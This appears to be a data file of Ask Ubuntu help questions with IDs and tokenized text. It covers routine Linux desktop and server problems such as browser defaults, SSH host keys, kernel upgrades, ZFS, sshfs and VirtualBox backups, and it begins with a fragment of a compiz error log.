option `` timestep '' already defined done initializing workarounds options ... [ error ] : option `` keep_minimized_windows '' already defined [ error ] : option `` legacy_fullscreen '' already defined [ error ] : option `` firefox_menu_fix '' already defined [ error ] : option `` ooo_menu_fix '' already defined [ error ] : option `` notification_daemon_fix '' already defined [ error ] : option `` java_fix '' already defined [ error ] : option `` java_taskbar_fix '' already defined [ error ] : option `` qt_fix '' already defined [ error ] : option `` convert_urgency '' already defined [ error ] : option `` aiglx_fragment_fix '' already defined [ error ] : option `` fglrx_xgl_fix '' already defined [ error ] : option `` force_glx_sync '' already defined [ error ] : option `` no_wait_for_video_sync '' already defined [ error ] : option `` force_swap_buffers '' already defined [ error ] : option `` sticky_alldesktops '' already defined [ error ] : option `` alldesktop_sticky_match '' already defined done initializing staticswitcher options ... done initializing resize options ... [ error ] : option `` initiate_button '' already defined [ error ] : option `` initiate_key '' already defined [ error ] : option `` mode '' already defined [ error ] : option `` resize_from_center '' already defined [ error ] : option `` border_color '' already defined [ error ] : option `` fill_color '' already defined [ error ] : option `` normal_match '' already defined [ error ] : option `` outline_match '' already defined [ error ] : option `` rectangle_match '' already defined [ error ] : option `` stretch_match '' already defined [ error ] : option `` resize_from_center_match '' already defined [ error ] : option `` outline_modifier '' already defined [ error ] : option `` rectangle_modifier '' already defined [ error ] : option `` stretch_modifier '' already defined [ error ] : option `` centered_modifier '' already defined done initializing fade options ... [ error ] : option `` fade_mode '' already defined [ error ] : option `` fade_speed '' already defined [ error ] : option `` fade_time '' already defined [ error ] : option `` window_match '' already defined [ error ] : option `` visual_bell '' already defined [ error ] : option `` fullscreen_visual_bell '' already defined [ error ] : option `` dim_unresponsive '' already defined [ error ] : option `` unresponsive_brightness '' already defined [ error ] : option `` unresponsive_saturation '' already defined done initializing scale options ... done initializing session options ... [ error ] : option `` save_legacy '' already defined [ error ] : option `` ignore_match '' already defined done compiz ( core ) - warn : failed to receive configurenotify event on 0x1800004
123064	opening links in existing chromium window	i 'm using kubuntu 10.04 , with a few gtk apps ( pidgin , evolution ) , and want to set chromium as my default browser . i 've set the default browser in kde 's system settings to chromium-browser , which works for kde apps . for gtk apps i set the same setting in gnome control center , but instead of opening in my existing chromium window , links from the apps open in a new window , with a error about not being able to access my profile . how can i make gtk apps use open links in the existing window ? edit : i should also add that when the new chromium window opens , the following error is displayed twice your profile could not be opened correctly . some features may be unavailable . please check that the profile exists and you have permission to read and write its contents .
123069	can firefox open ( embedded ) pdf 's without starting okular ?	how can i make firefox on kubuntu to open pdf in its embedded pdf viewer , like it does on windows ? currently it opens pdf 's in okular . some websites ( with embedded pdf 's ) malfunction because of this behavior .
123071	unable to connect to https sites with wired connection	i have a problem only with https sites . trying to access for example mail.google.com , after credentials , all browsers stay there waiting for response of https : //accounts.google.com with others https i have the same problem . the problem is present only using the wired connection . accessing via mobile run correctly . disabled ufw firewall = > nothing reinstalled libnss3-1d = > nothing i have the same problem with chrome , firefox and midori too . i am newbie on linux . thanks in advance . bye
123072	ssh : automatically accept keys	i 've written this small utility script : for h in $ server_list ; do ssh $ h `` uptime '' ; done when a new server is added to $ server_list , the script is stopped with : the authenticity of host 'blah.blah.blah ( 10.10.10.10 ) ' ca n't be established . rsa key fingerprint is a4 : d9 : a4 : d9 : a4 : d9a4 : d9 : a4 : d9a4 : d9a4 : d9a4 : d9a4 : d9a4 : d9 . are you sure you want to continue connecting ( yes/no ) ? i 've tried yes : for h in $ server_list ; do yes | ssh $ h `` uptime '' ; done with no luck . is there a way to parametrize ssh to automatically accept any new key ?
123073	reverting from emacs keybindings in chrome	i enabled emacs keybindings as an experiment using gconftool-2 and setting /desktop/gnome/interface/gtk_key_theme to emacs . i was n't happy with it and set it back to default . jeff @ london : ~ $ gconftool-2 -- get /desktop/gnome/interface/gtk_key_theme default jeff @ london : ~ $ but chrome continues to interpret keybindings as emacs . c-a goes to beginning of line rather than selecting all , c-k kills current line rather than beginning a web search , etc . i find plenty of references online on how to set emacs bindings , but removing them again is proving harder . any suggestions on what to look for ? ( it is possible , of course , that i did something or that something happened beyond the gconftool-2 setting . )
123077	installing applications from source	i was wondering about generic installations of all applications in linux . and what that means ? well , when i was using windows i knew that if i want to install an application i am double-clicking the .exe file and then next , next , next . in linux , i have understood that maybe there is a common ( not generic ) way to install any application . installing from source maybe ? well is there any step by step method that can be used to install application like in windows or not ? i am asking because i do not want to keep asking the google , how to ? so , i have managed to install recently from source freecad from this guide and i think that it would be a very nice start as common method , right ? but the thing then is where to find the right source and when an application has a very unique method of installation !
123079	i can not save or print pdf/ps output when i create a document in lyx	i installed lyx ( processor ) from the ubuntu software centre ( precise ) . it allows me to create and save lyx documents but only allows me to view the pdf/ps rendition . is there an additional package i need to install to have this functionality ?
123089	remove close button on specific application	i would like to remove the close button only on selected applications . is it possible ? my expected result would be deactivating skype 's tray ugly-icon and removing the close button from his window , so i reduce to possibility to accidentally close the app .
123092	open file using custom command : how to specify the file in cmd line ?	i want to open pdf using pdf-xchange viewer through wine . how should i specify the pdf file name in the `` custom command '' line so that i can open a pdf file using pdf-xchange viewer by double clicking it ? i tried to use the \ '' z : % f\ '' following the suggestion here for using foxit reader . but my pdf-xchange viewer only starts with an empty window . wine `` c : /program files/tracker software/pdf viewer/pdfxcview.exe '' \ '' z : % f\ '' i use ubuntu 10.04 and wine 1.2.2 . pdf-xchange viewer version 2.5 .
123098	first nautilus instance not showing / mounting ( removable ) devices in places pane	since a number of weeks i am having a strange issue with nautilus . before when i inserted a cd , i would be prompted for an action , if i inserted a usb stick it would be automatically mounted and shown and disk partitions that were not automatically mounted at boot time were shown under devices in the places pane . then a number of weeks ago this just stopped working , i have a hunch that this happened when i created an additional account that was activated for automatic login for a while . i have found out that when i just kill the initial nautilus -n instance started by gnome-session and then restart it from the desktop it will show the available devices ( like an inserted cd ) and i can then mount them by clicking . ( alternatively i can logout from the desktop and back on again ) . still , this is pretty annoying to have to do time and again . yes i know about the configuration settings that have to do with this and yes the automount settings are activated . i thought that there was maybe a relationship with the automatic logon but that appears not to be the case , if i disable that nautilus is still failing to show the devices the first time i login but showing them after logging out and back in again . this is ubuntu 11.10 32 bit , fully updated .
123099	not able to create boot partition in grub after resizing ubuntu partition	i booted from the live cd so that i could increase disk space and swap space of my ubuntu partition . earlier i have windows partition as well but i deleted it and gave space to my ubuntu partition . when i booted after this i got the dreaded `` no partition found '' grub error . after some research i found out that i needed a boot partition in order to boot . however , now when i create a new partition ( for boot ) , i can not manage `` flags '' on it . so , i 'm not able to create a partition with `` boot '' flag . please see the screenshot below . what should i do ? my intention was to set boot flag on the unallocatted space of 1.85 gb .
123101	need dell 15r n5010 linux ( ubuntu ) drivers	i have dell 15r n5010 model . now i want switch windows to linux ( ubuntu ) system . i cant find drives for linux .
123108	unity 3d launcher color/transparency with myunity 3.0	i have ubuntu 12.04 lts beta . i installed myunity 3.0 to be able to control the color and opacity of the launcher to override the whole chameleon idea . so far it seems the transparency setting works ( under 'launcher ' tab ) , but the color does n't . the color of the launcher will update when i change it , but when i close myunity it reverts back to chameleon immediately . any idea how to fix it ? thanks .
123112	where can i order pressed ubuntu 12.04 64bit desktop cds with professional graphics ?	canonical have confirmed today they will be shipping 32-bit desktop cds of 12.04 from their store , with the product page just updated to reflect this . i prefer 64-bit , i thought it was now the default offering based on several articles like this one ( 2buntu.com ) . i want to order pressed cds in 64-bit to hand out to people . they look professional , and i know from experience that people are more inclined to try ubuntu from one of these over a generic cd that i make . who offers pressed 64-bit 12.04 desktop cds that look professional , like the 32-bit version canonical offers ?
123116	anyone know how to write bengali or hindi ?	i have tried installing `` banglaword '' using wine which did not worked at all . i have tied using layouts but i feel it is too hard to make it work .
123121	upgrade to ubuntu 11.04 fails	i 'm currently using ubuntu 10.10 and i can not upgrade ubuntu 11.04 on my dell inspiron n5040.an error report comes up stating `` authenticating the upgrade failed . there may be a problem with the network or with the server. ``
123122	how do i install the 3.2 or the 3.3 kernels in 11.10 ?	i have a aspire one a0751h net-book that uses the emgd 1.10 driver and at the moment i 'm running ubuntu 11.10 with kernel 3.0.0-17-generic . but i was wondering if i could upgrade the kernel to 3.2 or 3.3 and have it fully working . i had tried to install kernel 3.2 rc4 but it did n't boot . i 'm still new to linux so i might have done it work . any comment or links to instructions will be greatly appreciated . thanks in advance . edit : i downloaded linux-headers-3.2.0-030200rc4-generic_3.2.0-030200rc4.201112012035_i386.deb linux-headers-3.2.0-030200rc4_3.2.0-030200rc4.201112012035_all.deb linux-image-3.2.0-030200rc4-generic_3.2.0-030200rc4.201112012035_i386.deb from this link kernel.ubuntu.com/~kernel-ppa/mainline/v3.2-rc4-oneiric then i used gdeb package installer to install the 3 files using the instructions found on this site http : //forums.linuxmint.com/viewtopic.php ? f=42 & t=40185 i know ubuntu 12.04 uses kernel 3.2 but default but there is no 3d available for my card ( gma500 ) on 12.04
123123	how to use kdevelop to write c++ programs ?	how i can build c++ applications using kdevelop . where i can find tutorials for kdevelop4 ? how to set the path for it ? how i can build a gui application using kdevelop 4.2 ? whenever i try to run any program it says `` process error : could not start the program , make sure the path is specified corectly '' what path i need to set ?
123124	ubuntu does n't boot after apt-get upgrade ( black screen )	some time ago ( 2 weeks ) i ran apt-get upgrade . when complete i turned off the computer . i was on vacation . when i returned i noticed that my computer will not boot . during normal startup displays a black screen and the upper left corner blinking `` _ '' character . i tried to run the recovery mode from grub . instead , the console displays the following screen view : http : //smaller.dyn.pl/rescue_mode.jpg ... init : failed to spawn friendly-recovery pre-start process : unable to execute : no such file or directory when i started in normal mode , changing the parameter 'quiet splash ' to 'nomodeset ' , i saw the following view : http : //smaller.dyn.pl/normal_mode.jpg please advice how can i fix this problem , i 'm new to linux . i have no idea what i could do . on various forums i found similar problems but no effective solution . configuration of the new station will take me a long time due to the nature of my work . i 'm working on ubuntu desktop 11.10 br , smaller
123126	how do i mount a zfs pool ?	sorry for asking an ubuntu concerning question , but i hope that someone here has some experience with that . i have to mount the zfs pool i created with freenas8 on ubuntu . i tried it as described here . i was able to run that command without error : sudo zpool import data and the status of my zpool is like this : user @ server : ~ $ sudo zpool status pool : data state : online status : the pool is formatted using an older on-disk format . the pool can still be used , but some features are unavailable . action : upgrade the pool using 'zpool upgrade ' . once this is done , the pool will no longer be accessible on older software versions . scan : none requested config : name state read write cksum data online 0 0 0 sda2 online 0 0 0 sdb2 online 0 0 0 errors : no known data errors so it looks good to me . but , i dont know how to access the pool . in my eyes i have to mount it , but i dont know how .
123131	why does ubuntu 's default screenshot app not work properly ?	let 's say that i click on the screenshot app that comes bundled with ubuntu 11.10 , and then select `` select area to grab '' followed by drawing the desired area , the resulting screenshot that is captured is , too often , coated with an ubuntu-coloured glaze . for example , if i screencap this ask ubuntu website , the white areas ( all area , in fact ) will come out with an orange hue . i 'll cancel and repeat the process until the result is correct . does my description help ? if so , then any idea why it happens and how to fix it ?
123133	speech recognition on ubuntu server , what are my options ?	i want my ubuntu server to start playing music when i say the command , just like on iphone ... `` play [ album ] '' `` play [ song ] '' etc . i also want it to turn on light on my arduino project . so to achieve this , i either need something already done , or i need to write something myself . obviously , speech recognition software exists , i found few that seems solid : julious , sphinx . any help appreciated with this home server project . thanks
123134	why not permit read access for all in /var/log ?	there are many log files in /var/log that i do not have permission to read with my normal user . i have to use sudo to add read permission first . it 's getting annoying , especially having to repeat the same thing on different machines . is there a good reason for this ?
123136	create a partition in virtual machine !	i want to create a partition in virtual machine ubuntu 11.10 32 bit so that i can test a few things . i use a guide for smthing i want to do and it says that i should create a partition in my system but i do not want to have a partition in my main system so i think that i can install ubuntu 11.10 32 bit on virtual machine , then create a partition in virtual disk , is it possible ? thanks
123140	how to stick an icon on the menu bar ?	i 'm really tired ; i ca n't think of words right now , which is why i said `` stick it '' on the `` menu bar '' despite that i know there 's more accurate wording . but hopefully you know what i mean . i downloaded textadept , a simple text editor program , and i want to stick in on the bar , but when i drag the icon over it just bounces back . i 'm new to ubuntu , what do i do ?
123145	how to install linux-libre-3.3 kernel ?	linux-libre 3.3 kernel released on last month . is it possible to install linux-libre 3.3 on my ubuntu 12.04 beta 2 64 bit version . advance thanks for all gnu free software developers .
123151	building a ubuntu image ready with necessary software	my friend want to have ubuntu installed but do n't have access to high speed internet . so i want to build an image which will include all necessary softwares like vlc , gimp and some other things . what is the most preferable option ? a tutorial perhaps . note : i would like to avoid apton cd or keryx , i want an image that will install the software automatically with installation of ubuntu
123159	how can i stop wine from modifying my display layout ?	i have two monitors and some wine programs like to disable one of them . i 've tried disabling `` allow the window manager to decorate the windows '' and `` allow the window manager to control the windows '' however this keeps happening . is there a way to stop programs run in wine from modifying your display settings ?
123162	make bootable win8 usb on and for ubuntu macbook	( some time ago , i bought a new hdd for my macbook 2,1 . i put it in and installed ubuntu on it , using a cd . everything went fine , did n't have to setup any special apple stuff , did n't need to bless my partition , make an efi partition , etc . everything was done for me . ) recently , i found out that my dvd drive broke . i want to install windows 8 consumer preview onto my macbook , next to the ubuntu install , preferrably using grub to chainload the windows 8 bootloader . however , since my dvd drive is broken , the only way for me to install it is to use a usb drive . i tried making a bootable usb stick for my macbook , but without luck . i ca n't seem to be able to get the windows 8 setup on it . i also tried installing it via a rawdisk image in virtualbox ( directly to a partition , so i 'm also making sure my bootloader does n't get overwritten , which windows usually does ) , but i do n't have enough ram to do that i 'm afraid . so my question is : how do i make a bootable usb drive for my macbook so i can install windows 8 ? and when that works , how do i get my grub back ? ( if windows overwrites it ) for people not familiar with how apple computers boot operating systems : new apple computers use efi , a newer computer firmware to replace the old bios . this and some limitations ( put in by apple ) , some of which are explained here , make it difficult to make a bootable usb drive . i have another computer with windows 7 and ubuntu .
123163	firefox addon not working [ firefox 11 ]	i have installed fx chrome theme from the firefox addons website . to tweak it i also installed fx chrome mods . but when i click on preferences to open the settings of the fx chrome mod addon but it does n't work . how to fix this ? please help !
123166	do-release-upgrade eats precious disk space on the vps	i have an issue ( obviously , thats why im posting it here ) . i have a vps with a provider which has only 2.5gb of space . now the said provider only supports ubuntu lts templates and not the other ones so the latest one i have is 10.04 lts which installs and takes only 400mb of space . now i wanted to update to 11.10 new release 'xxxxxxx ' available . run 'do-release-upgrade ' to upgrade to it . i got tempted and upgraded it to 11.10 and now i can see that my disk usage ( just doing the updates with no actual data on the vps ) , my consumption has raised from 400mb something to 1.5gb can someone let me know whats the issue ? probably some temp files that should not have been there ?
123169	ca n't resolve domain names starting with a dash	i ( and many other users ) ca n't access pages which url contains a dash in its subdomain ; example : fragmented -- -.deviantart.com checked with other os : there 's a page really dwelling here . and you can verify that deviantart normally sends you a 404 page . checked with many web browsers : it does n't work with ubuntu neither debian .
123172	how to see the discharge rate of the battery	maybe this question was made earlier but i ca n't find it . i want to see a terminal command or gui program that can show me the discharge rate of the battery . what hardware parts or programs are using more watts . edit : found additional information regarding my question when using for example powertop : https : //bbs.archlinux.org/viewtopic.php ? id=128319 https : //bugs.archlinux.org/task/26416 both related to the having disable acpi_procfs_power in the kernel .
123174	gnome shell keeps falling back to classic desktop when trying to enable it on an optimus laptop	i have installed ubuntu 12.04 beta , and after installing the gnome-shell each time before i log in , when i select gnome desktop , i get the gnome backfall ( classic ) desktop . i also noticed that i can not enable compiz , ( i could with the 10.10 version ) , i dont know if it has something to do with the drivers . i have a intel i3 processor
123177	is there a way to reset smbclient settings to the default ?	i think i made a few bugs in config settings of smb.conf and i want to get my original network settings back..is there any way for that ?
123180	pause , backup and then restart virtualbox vm	what i want to be able to do is to pause a virtualbox vm , back it up and then restart it . i want to create a cron script to do this . i believe that these are the commands i need , but i do n't know how to back up ( the middle bit ) : vboxmanage controlvm `` windows server '' savestate while [ `vboxmanage list runningvms | grep `` windows server '' | wc -l` = `` 1 '' ] do sleep 2 done # here is the bit i do n't know to do ... # i need to somehow create a backup of the vm here ... i 'm sure its not # that difficult , but i do n't know where to start or whether what i # would come up with would be the best way # restart using start-stop-daemon ... dunno why ! this is in my init.d script # and was the only way it worked ( as far as i could work it ! haha ) start-stop-daemon -- background -- chuid user -- make-pidfile -- pidfile `` $ pidfile '' -- start -- exec /usr/bin/vboxheadless -- -- startvm `` windows server '' if anyone could give me a few lines of code which will backup my vm to a specific place that would be good . i 've fallen at the first hurdle tbh , i 'm then going to try and tar the backup and rsync it to my nas . we shall see how easy that bit is after this ! : p haha thanks for your help guys .
123185	can i use the php dotnet function ?	i 'm a .net developer and usually i wrote apps/services that can run under linux using mono . today i started using dotnet php function and i was able to use it on windows/apache : < ? php try { $ csclass = new dotnet ( `` csharpcom , version=1.0.0.0 , culture=neutral , `` . `` publickeytoken=beb607ae770f5750 '' , `` csharpcom.csharpcomclass '' ) ; echo $ csclass- > base64 ( `` io mi chiamo marco giacinti '' ) , '' \n '' ; echo $ csclass- > random2 ( 10,20 ) , '' \n '' ; echo $ csclass- > random1 ( 5 ) , '' \n '' ; } catch ( exception $ e ) { echo 'caught exception : ' , $ e- > getmessage ( ) , `` \n '' ; } ? > where csharpcom.csharpcomclass is a dll developed with framework 3.5 and installed in gac using gacutil -i path\csharpcomclass.dll . when i save this script as dotnet.php and navigate to http : //localhost/dotnet.php apache respond with http 500 internal error is there any way to use dotnet php function on ubuntu ?
123186	ca n't install ubuntu 11.10	i have tried to instll ubuntu on my old laptop running win 7 for a week now , but all of my attepts have been unsuccessful so far . i have never used it before so it is very new to me . i have burned 2 discs with different isos and both did n't even get to the installer . first time i saw the installer was with unetbootin and the it showed some error about my cdrom not being able to unmount . i even bought a 4gb usb to install with livelinux and that gave me the same error . my old laptop has an intel 945 motherboard . please help .
123187	removing a tree	code edit so now that i 'm off work i can do a little coding in my free time . the way that i think i want this to work is take a tarball ( what i would normally extract to a folder anyway ) and compare that to our working directory . so ... . i managed to remove the top level directories by counting their string length and subtracting that from my echo length ! ! baby steps 0= ) # ! /bin/bash # $ 1 is the file to test # $ 2 is the base folder # minus the length of the top level directories and slashes len=`expr length `` $ 1 $ 2 '' `-2 for file in $ ( tar -- list -f $ 1 | perl -pe'chomp ; $ _=qq [ `` ' $ 2 ' $ _ '' ] ' ) do # work around bash deficiency if [ [ -e `` $ ( perl -eprint $ file ) '' ] ] then # do nothing , we need a file does n't exist flag = ( echo '' ; else echo `rm -f $ 2 $ { file : len : -1 } ` # remove dir length and quotes fiy done $ ./stree mot-add.tar.gz mot/ [ output ] # this blank space is left from removing top level directory server/ server/artwork/ server/artwork/erase-me2.jpg server/artwork/erase-me1.jpg server/artwork/erase-me3.jpg server/erase-me.nfo erase-me.log erase-me/ client/ client/dependancies/ client/dependancies/erase-me.func.php client/erase-me.phtml i 'm still displaying directories that should n't be there . = ( removing quotes was fixed with echo $ { file : len : -1 } but leaves newlines for the top level directory end code edit so i 'm thinking that since the directories now exist in two places , the will display or not display regardless . would it be better idea to : use the program on a switch to add/remove on add , image the directory structure to install to $ tar cf dirs.tar -- no-recursion -- files-from < ( find . -type d ) add it to the installation tar use it later maybe , as a diff file for the directories ? i dunno , opinions ? it also looks like my perl script is n't really matching for some reason , anyone have an idea ? after running a test erase i got this . $ tree mot mot ├── client │ ├── dependancies │ │ ├── err_config.ini.php │ │ ├── modernizr.custom.97882.js │ │ ├── propercountry.js │ │ └── sender.php │ └── index.php └── server ├── artwork │ ├── cert01.jpg │ ├── cert02.jpg │ ├── cert03.jpg │ ├── cert04.jpg │ ├── cert05.jpg │ ├── cert06.jpg │ └── gdincludes │ ├── overlay.png │ └── renaissance.ttf ├── cache ├── dependancies │ ├── cert05.jpg │ ├── crypt.func.php │ ├── err_config.ini.php │ ├── gdimageprocess.func.php │ └── pdo.func.php ├── erase-me.log ├── listener.log └── receiver.php 7 directories , 21 files $ ./stree mot-add.tar.gz mot/ mot/ mot/server/ mot/server/artwork/ mot/server/artwork/erase-me2.jpg mot/server/artwork/erase-me1.jpg mot/server/artwork/erase-me3.jpg mot/server/erase-me.nfo mot/erase-me.log mot/erase-me/ mot/client/ mot/client/dependancies/ mot/client/dependancies/erase-me.func.php mot/client/erase-me.phtml old this is a little conceptual so i 'll explain it the best i can . i have a copy of files that i 've placed in a directory , i 'd like to use that skeleton of our copy to remove all files that match on our server . it would have to be able to know if there are other files or directories that are not part of that tree and leave them . so lets do an example real quick , just in case i 'm not being very clear . here was the origional structure $ tree mot-origional mot-origional ├── client │ ├── dependancies │ │ ├── err_config.ini.php │ │ ├── modernizr.custom.97882.js │ │ ├── propercountry.js │ │ └── sender.php │ └── index.php └── server ├── artwork │ ├── cert01.jpg │ ├── cert02.jpg │ ├── cert03.jpg │ ├── cert04.jpg │ ├── cert05.jpg │ ├── cert06.jpg │ └── gdincludes │ ├── overlay.png │ └── renaissance.ttf ├── cache ├── dependancies │ ├── crypt.func.php │ ├── err_config.ini.php │ ├── gdimageprocess.func.php │ └── pdo.func.php ├── listener.log └── receiver.php 7 directories , 20 files here 's what was added $ tree add-to-mot add-to-mot/ ├── client │ ├── dependancies │ │ └── erase-me.func.php │ └── erase-me.phtml ├── erase-me.log └── server ├── artwork │ ├── erase-me1.jpg │ ├── erase-me2.jpg │ └── erase-me3.jpg └── erase-me.nfo 4 directories , 7 files then the combined would look like this $ tree mot mot ├── client │ ├── dependancies │ │ ├── erase-me.func.php │ │ ├── err_config.ini.php │ │ ├── modernizr.custom.97882.js │ │ ├── propercountry.js │ │ └── sender.php │ ├── erase-me.phtml │ └── index.php ├── erase-me.log └── server ├── artwork │ ├── cert01.jpg │ ├── cert02.jpg │ ├── cert03.jpg │ ├── cert04.jpg │ ├── cert05.jpg │ ├── cert06.jpg │ ├── erase-me1.jpg │ ├── erase-me2.jpg │ ├── erase-me3.jpg │ └── gdincludes │ ├── overlay.png │ └── renaissance.ttf ├── cache ├── dependancies │ ├── cert05.jpg │ ├── crypt.func.php │ ├── err_config.ini.php │ ├── gdimageprocess.func.php │ └── pdo.func.php ├── erase-me.nfo ├── listener.log └── receiver.php 7 directories , 27 files so i keep a directory fleshed out like add-to-mot/ always for backup purposes , but i would like to try taking the output from a tree for instance ... . [ output ] add-to-mot client dependancies erase-me.func.php erase-me.phtml erase-me.log server artwork erase-me1.jpg erase-me2.jpg erase-me3.jpg erase-me.nfo $ tree -i add-to-mot -o rm-file.nfo $ cat rm-file.nfo | rm -rf mot/* or something like the above , where i pipe the output of one directory tree , into a remove statement for a different directory tree . does that make sense ? i thought it would be an interesting `` how would i ? '' question . i 'm not aversed to writing a bash script to do this , it does n't necessarily have to be a one liner . that above will delete without prejudice though , i 'd like to be able to sense other files and directories , and not delete willy-nilly . hey it might be nice to even create a backup ( mot-treetrim.tar.gz ) until i can verify that i have n't mass erased important files/folders . thanks greatly guys !
123190	mounting an apple tv on ubuntu ?	note : i was n't sure whether to put this question here , or on apple.se , so if you think it would be better served there , feel free to migrate it , although i thought that because it was primarily about the mounting of the drive on ubuntu , it was more appropriate to ask here . i recently bought an apple tv . i wanted to see what exactly was inside , so i tried mounting it as a device in ubuntu . when i did it , there were 2 devices that were listed : `` apple tv '' , and `` documents on apple tv '' the `` apple tv '' drive worked fine , but when i tried opening `` documents on apple tv '' , i got the following error message : error : unhandled lockdown error ( -256 ) why is this happening ? what do i have to do to get it to mount properly ?
123197	/etc/apt/apt.conf gets cleared every time i change proxy settings under settings- > network- > network proxy	i use a proxy server settings at work but when i get home , my network connection uses no proxy settings . every time i get home and use the proxy settings under settings- > networks- > network proxy to set to `` none '' , the file /etc/apt/apt.conf gets cleared and the following day in the morning i have to edit the file and type in the command again , or at least copy paste from a backup file . how can i avoid this situation , its tiring , how can i make the proxy settings gui write to this file for apt-get and software center to work when i set proxy under network settings ?
123200	tool to transform webmail to imap	i have a problem . i work for a company that only provides webmail for users ( admins tell it is for security blabla , i have no influence on that ) since i receive a lot of mails working with webmail is very uncomfortable . therefore i would like to know if any of you is aware of a kind of gateway that would allow me to use an imap client ( mutt in my case ) to connect to that webinterface . this kind of gateway certainly exists . my company uses outlook . i would be very happy if you could point me to a tool playing that kind of gateway .
123206	terminal output scrolling is gone ( headless 11.10 server , upgraded from 10.10 )	i recently upgraded a 10.10 server ( headless , ec2 ) to 11.04 and then to 11.10 . both upgrades seem to have worked , but now my terminal acts differently , particularly concerning output scrolling . i am accessing this server via terminal on a 11.10 desktop ( gnome fallback ) . 10.10 behavior : a scroll bar is displayed on the right side of my terminal , allowing me to scroll back to older output turning the mouse wheel scrolls back to older output 11.10 behavior : no scroll bar is visible turning the mouse wheel cycles the current line through my command history ( same as up key ) this is a difficult issue to describe succinctly and i 've had no luck finding any information about this . but i 've performed the same upgrade several times ( 10.10- > 11.10 ) and the result is always the same concerning terminal scrolling . output scrolling is very important to me and something i take for granted - i 'm concerned i 'll be unable to work effectively on this server until i resolve this . update - problem magically gone after logout/login well , as i said i 've done the same upgrade several times and encountered the same problem . however , in the previous tries i was scared away and gave up . this time i was more determined to finish the upgrade and by simply logging out and back in to the server via ssh the problem has corrected itself .
123208	custom package is uninstallable	i have a custom package i 've built , python-amqplib , which relies on python > = 2.5 . i 'm using repoman to push to my repo via jenkins , which reports the build was pushed successfully . after an apt-get update it shows when i run apt-cache search python-amqplib . however , i ca n't install it nor does anything show up when i run apt-cache show python-amqplib . here 's what it spits out when i try to install it : # apt-get install python-ampqlib reading package lists ... done building dependency tree reading state information ... done package python-ampqlib is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package python-ampqlib has no installation candidate here 's what apt-cache policy shows : # apt-cache policy python-amqplib python-amqplib : installed : ( none ) candidate : 1.0.2-4-4 version table : 1.0.2-4-4 0 500 http : //apt01.my-server.com/ mycompany-staging/main packages 0.6.1-1 0 500 http : //us.archive.ubuntu.com/ubuntu/ lucid/universe packages
123215	sshfs is mounting filesystems as another user	so i am trying to mount a folder from another computer in my lan , and i am able to ssh without any issues . but , i am unable to make any changes when i access the mounted folder . this is what i have done so far : install : $ sudo apt-get install sshfs $ sudo modprobe fuse $ sudo adduser < username > fuse $ sudo chown root : fuse /dev/fuse $ sudo chmod +x /dev/fuse $ mkdir ~/remoteserv and when i access the remote folder via sshfs : $ sshfs -o idmap=user < username > @ < ipaddress > : /home/user ~/remoteserv the output of becomes : $ ~/remoteserv $ ls -l total 60 drwxr-xr-x 1 < notmyusername > < notmyusername > 4096 2012-04-13 21:54 desktop drwxr-xr-x 1 < notmyusername > < notmyusername > 4096 2012-04-10 13:05 documents drwxr-xr-x 1 < notmyusername > < notmyusername > 4096 2012-04-17 19:06 downloads drwxr-xr-x 1 < notmyusername > < notmyusername > 4096 2012-04-13 21:55 music drwxr-xr-x 1 < notmyusername > < notmyusername > 4096 2012-04-03 15:07 pictures ... more of the same i am unable to access any of the files properly because sshfs is mounting the files under my wife 's username ! i have no idea why , and i feel like i have made a large mistake somewhere . is there some configuration file which i need to tweak somewhere ? i ca n't seem to find anything on the manpage : / i even tried an -o allow_other option when i mounted , but it still mounted it under my wife 's username ! what is going on ?
123216	booting to ubuntu 10.10 results in ear drum splitting noise	i recently upgraded from ubuntu 10.04 lts to 10.10 due to a compatibility issue with a software library i need to use . since upgrading , whenever i boot up the system to ubuntu there is a very loud and harsh electronic screeching sound that seems to be emitted from the laptop speakers . to stop this sound i press the power button once or twice , which seems to solve the issue ( i do not power off the system , just press the power button 1-2 times ) . when booting into windows , this horrible sound is not produced . any ideas on what could be causing this sound and how do i fix it ? it is only a matter of time before i have to boot up ubuntu in the library : -/
123217	problem upgrading 11.04	i 've been trying to upgrade my ubuntu 11.04 desktop computer , but when i click on the ugrade button : i get this error : i 've tryied to change my repositories , but it changes nothing in the error ( ( on the `` setting new software channel '' ) . can someone point me in the right direction ? this is my sources.list : # deb http : //ppa.launchpad.net/ailurus/ppa/ubuntu karmic main # disabled on upgrade to karmic # deb-src http : //ppa.launchpad.net/ailurus/ppa/ubuntu karmic main # disabled on upgrade to karmic # deb cdrom : [ ubuntu 9.04 _jaunty jackalope_ - release i386 ( 20090421.3 ) ] / jaunty main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //us.archive.ubuntu.com/ubuntu/ natty main restricted multiverse universe # # major bug fix updates produced after the final release of the # # distribution . deb http : //us.archive.ubuntu.com/ubuntu/ natty-updates main restricted multiverse universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . # # uncomment the following two lines to add software from the 'backports' # # repository . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb-src http : //pt.archive.ubuntu.com/ubuntu/ jaunty-backports main restricted universe multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu natty partner deb-src http : //archive.canonical.com/ubuntu natty partner deb http : //us.archive.ubuntu.com/ubuntu/ natty-security main restricted multiverse universe deb http : //us.archive.ubuntu.com/ubuntu/ natty-proposed restricted main multiverse universe # deb http : //deb.torproject.org/torproject.org karmic main # disabled on upgrade to maverick # deb-src http : //deb.torproject.org/torproject.org karmic main # disabled on upgrade to maverick deb http : //extras.ubuntu.com/ubuntu natty main # third party developers repository
123220	how to encrypt folders on my nas with cryptkeeper ?	i use encfs with cryptkeeper to manage my encrypted folders ( containing personal data files , bank , scans ... ) . i would like to encrypt a folder on my nas synology but even when i have my nas folder mounted on ubuntu i can not create an encrypted folder with cryptkeeper because the nas is n't visible : i only have the local folders . if someone have the solution , i would like to avoid the commande line , but maybe i can create a specific launcher for the folder ? i would prefer cryptkeeper . thx in advance . d .
